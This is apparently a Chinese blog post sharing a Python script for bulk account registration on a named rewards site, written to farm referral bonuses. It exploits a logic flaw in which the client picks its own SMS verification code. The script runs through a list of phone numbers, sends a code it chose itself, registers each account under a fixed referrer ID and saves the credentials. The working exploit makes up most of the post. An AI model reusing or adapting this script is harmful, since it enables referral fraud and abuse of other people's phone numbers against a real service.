为了羊毛而写的自动注册脚本

撸羊毛的时候发现一个逻辑漏洞,验证码会在请求包中,看到易语言大佬们写的各种软件,很不服气,于是自己也写了个脚本来跑。。。。(目前号已被封),发出来就当是做个简单的笔记。

运行效果图:

效果图

代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
#coding:utf-8
import re
import requests
from bs4 import BeautifulSoup
import time
import random
import sys

if __name__ == '__main__':
if len(sys.argv) < 2:
print("[*]Usage : Python 1.py http://a.weizhuan.ren/register.php?tid=2441")
sys.exit()

text = '''
____ _ _ _
| _ \ _ (_) | | | |
| |_) | _ _ (_) _ ___ ___ | |__| |
| _ < | | | | | | / __|/ _ \| __ |
| |_) || |_| | _ | || (__| __/| | | |
|____/ \__, |(_)|_| \___|\___||_| |_|
__/ |
|___/

'''
print('*' * 50)
print(text + '\033[0m\n')
print('*' * 50)
success_list = open("success.txt",'a')
success_list.write(" 手机号" + " " + " 密码" + " " + " 验证码" + "\n")
success_list.close()
host = 'http://a.weizhuan.ren'
url = sys.argv[1]
for line in open("Phone.txt","r"):
success_list = open("success.txt",'a')
Randcode = random.randint(100000, 999999) #获取随机6位数验证码
password = line.replace("\n","")[2:9] #从手机号密码
print('当前注册的手机号码为:'.decode('utf-8') + str(line.replace("\n","")))
print('密码为:'.decode('utf-8') + str(password))
print('验证码为:'.decode('utf-8') + str(Randcode))
Codeheaders = {'Content-Length': '50','Accept': '*/*','Origin': 'http://a.weizhuan.ren','X-Requested-With': 'XMLHttpRequest','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",'Referer': url,'Accept-Encoding': 'gzip, deflate','Accept-Language': 'zh-CN,zh;q=0.8','Cookie': 'PHPSESSID=54ijqh0b8iel5kkg222744sh44; lsgseuid=2523; lsgseckrnd=dbcc82ecef8a10fe42cf19cdc2727cc8','Connection': 'close'}
Codedata = {'function': 'sendCode', 'phonenum': line.replace("\n",""), 'code': Randcode}
print('正在发送验证码'.decode('utf-8'))
print(Codedata)
time.sleep(2)
Coders = requests.post(host + "/doajax/userAjaxRequest.php", data=Codedata, headers=Codeheaders)
if 'Success'.decode('utf-8') in Coders.text:
print('验证码发送成功,验证码为:'.decode('utf-8') + str(Randcode))
else:
print('验证码发送失败'.decode('utf-8'))

time.sleep(2)

Regheaders = {'Content-Length': '81','Accept': 'application/json, text/javascript, */*; q=0.01','Origin': 'http://a.weizhuan.ren','X-Requested-With': 'XMLHttpRequest','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','Content-Type': 'application/x-www-form-urlencoded','Referer': url,'Accept-Encoding': 'gzip, deflate','Accept-Language': 'zh-CN,zh;q=0.8','Cookie': 'PHPSESSID=54ijqh0b8iel5kkg222744sh44','Connection': 'close'}
Regdata = {'function': 'onReg','phonenum': line.replace("\n",""), 'password': password, 'referee': 2441, 'verifycod': Randcode}
print('正在注册帐号'.decode('utf-8'))
print(Regdata)
Regrs = requests.post(host + "/doajax/userAjaxRequest.php", data=Regdata, headers=Regheaders)
if 'OK'.decode('utf-8') in Regrs.text:
print('注册成功,手机号为:'.decode('utf-8') + str(line.replace("\n","")) + ' 验证码为:'.decode('utf-8') + str(Randcode))
elif '\u9a8c\u8bc1\u7801\u4e0d\u6b63\u786e'.decode('utf-8') in Regrs.text:
print('验证码不正确'.decode('utf-8'))
elif '\u8be5\u624b\u673a\u53f7\u7801\u5df2\u88ab\u6ce8\u518c'.decode('utf-8') in Regrs.text:
print('该手机号码已被注册'.decode('utf-8'))
else:
print(Regrs.text)

success_list.write(line.replace("\n","") + " " + str(password) + " " + str(Randcode) + "\n")
success_list.close()
time.sleep(10)
print("ε=ε=ε=ε=ε=ε=┌(; ̄◇ ̄)┘暂停10秒,不要太快哦!!!".decode('utf-8') + '\n')
-------------本文结束感谢您的阅读-------------